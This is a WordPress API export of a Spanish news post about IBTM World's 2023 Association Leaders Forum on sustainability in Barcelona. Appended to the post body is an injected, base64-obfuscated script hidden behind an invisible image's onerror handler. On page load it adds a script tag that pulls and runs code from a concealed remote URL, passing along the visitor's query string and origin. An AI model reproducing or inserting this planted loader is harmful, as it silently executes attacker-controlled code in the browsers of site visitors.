{"id":7240,"date":"2023-08-22T09:27:16","date_gmt":"2023-08-22T12:27:16","guid":{"rendered":"https:\/\/argentinatermal.com.ar\/?p=7240"},"modified":"2025-08-13T15:55:12","modified_gmt":"2025-08-13T18:55:12","slug":"la-sostenibilidad-en-el-punto-de-mira-del-foro-de-lideres-de-la-asociacion-mundial-de-ibtm","status":"publish","type":"post","link":"https:\/\/argentinatermal.com.ar\/?p=7240","title":{"rendered":"La sostenibilidad en el punto de mira del Foro de L\u00edderes de la Asociaci\u00f3n Mundial de IBTM"},"content":{"rendered":"\n<h4 class=\"wp-block-heading has-white-color has-text-color has-background\" style=\"background-color:#043f61\"><em>El renombrado evento se centrar\u00e1 en c\u00f3mo la comunidad de asociaciones puede contribuir al debate en curso sobre la sostenibilidad y los desaf\u00edos que conlleva<\/em><\/h4>\n\n\n\n<p>Teniendo lugar en Fira, Barcelona, el martes 28 de noviembre de 2023, y producido en colaboraci\u00f3n con la prestigiosa ESAE (Sociedad Europea de Ejecutivos de Asociaciones), el Foro de L\u00edderes de Asociaciones Mundiales de IBTM destaca el poder de los profesionales de eventos para dar forma a la cultura e impulsar la futuro de los negocios.<\/p>\n\n\n\n<p>El programa se ha convertido en el punto de encuentro anual para que los l\u00edderes de la asociaci\u00f3n intercambien, aprendan y avancen conocimientos y mejores pr\u00e1cticas en un entorno de igual a igual.<\/p>\n\n\n\n<p>Las presentaciones de alto nivel, las charlas rel\u00e1mpago y los debates interactivos son parte de un formato nuevo y fresco dise\u00f1ado para infundir energ\u00eda y fomentar la cultura entre los participantes, para reemplazar ese sentido de comunidad que puede haberse perdido en el cambio al trabajo desde casa.<\/p>\n\n\n\n<p>El programa se abrir\u00e1 con una exploraci\u00f3n que invita a la reflexi\u00f3n sobre las tendencias de asociaci\u00f3n para 2024 de Mike Morrissey, presidente de ESAE y director ejecutivo de la Organizaci\u00f3n Europea contra el C\u00e1ncer. A esto le seguir\u00e1 un debate dirigido por oradores moderado por Mohamed Mezghani, Secretario General de la UITP (Asociaci\u00f3n Internacional de Transporte P\u00fablico). El debate se centrar\u00e1 en los viajes y la sostenibilidad, y los participantes explorar\u00e1n el m\u00e9rito de la compensaci\u00f3n de carbono y los efectos positivos m\u00e1s amplios para la sociedad que puede tener una reuni\u00f3n o una conferencia. Despu\u00e9s de esto, una selecci\u00f3n de l\u00edderes de asociaciones de alto perfil participar\u00e1 en un panel de discusi\u00f3n sobre c\u00f3mo las asociaciones pueden cambiar el mundo para mejor. La discusi\u00f3n incluir\u00e1 la incorporaci\u00f3n de ESG en la toma de decisiones y las operaciones, y explorar\u00e1 temas como DEI, Sostenibilidad y Responsabilidad Corporativa. &nbsp;<\/p>\n\n\n\n<p>Las sesiones de la tarde contar\u00e1n con charlas rel\u00e1mpago de ritmo r\u00e1pido sobre temas candentes que incluyen Inteligencia Artificial, ESG e Impacto vs Medio Ambiente. Habr\u00e1 oportunidades para establecer contactos a lo largo del foro, as\u00ed como bebidas para establecer contactos despu\u00e9s.<\/p>\n\n\n\n<p>Mike Morrissey dijo: \u00abCuando las asociaciones se unen para compartir conocimientos e ideas, sabemos que realmente pueden marcar la diferencia. Este foro es un espacio para que los profesionales de la asociaci\u00f3n y los eventos debatan los temas que les son propios. Estamos encantados de trabajar con IBTM en el contenido de este importante evento e invitamos a todos los profesionales de eventos de la asociaci\u00f3n a unirse a nosotros, hacer conexiones y compartir su inspiraci\u00f3n e ideas\u00bb.<\/p>\n\n\n\n<p>David Thompson, director de eventos de IBTM World, dijo: \u00abEste interesante foro sobre el importante tema de la sostenibilidad, que incorpora el medio ambiente, lo social y la gobernanza, est\u00e1 dise\u00f1ado para alimentar la curiosidad de los delegados, inspirar a los asistentes a marcar la diferencia y proporcionar el est\u00edmulo que los delegados necesitan. para fomentar el florecimiento de la cultura. La cultura empresarial prospera cuando estamos juntos, y el foro brinda un espacio para que esta cultura crezca\u00bb.<\/p>\n\n\n\n<p>La ESAE es la organizaci\u00f3n l\u00edder en Europa en reunir a los profesionales de la asociaci\u00f3n. Facilita el intercambio de mejores pr\u00e1cticas entre pares y asegura que los l\u00edderes actuales y futuros comprendan el negocio y la estrategia de la asociaci\u00f3n.<\/p>\n\n\n\n<p>El Foro de l\u00edderes de asociaciones est\u00e1 abierto a compradores de asociaciones y medios selectos que asisten a IBTM World. Para solicitar el Programa y foro de Hosted Buyer, env\u00ede sus datos a trav\u00e9s del sitio web de IBTM World .<\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>El renombrado evento se centrar\u00e1 en c\u00f3mo la comunidad de asociaciones puede contribuir al debate en curso sobre la sostenibilidad y los desaf\u00edos que conlleva Teniendo lugar en Fira, Barcelona, el martes 28 de noviembre de 2023, y producido en colaboraci\u00f3n con la prestigiosa ESAE (Sociedad Europea de Ejecutivos de Asociaciones), el Foro de L\u00edderes [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":7241,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[22],"tags":[],"class_list":["post-7240","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-turismo-sostenible"],"_links":{"self":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/7240","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=7240"}],"version-history":[{"count":2,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/7240\/revisions"}],"predecessor-version":[{"id":10329,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/7240\/revisions\/10329"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/media\/7241"}],"wp:attachment":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=7240"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=7240"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=7240"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}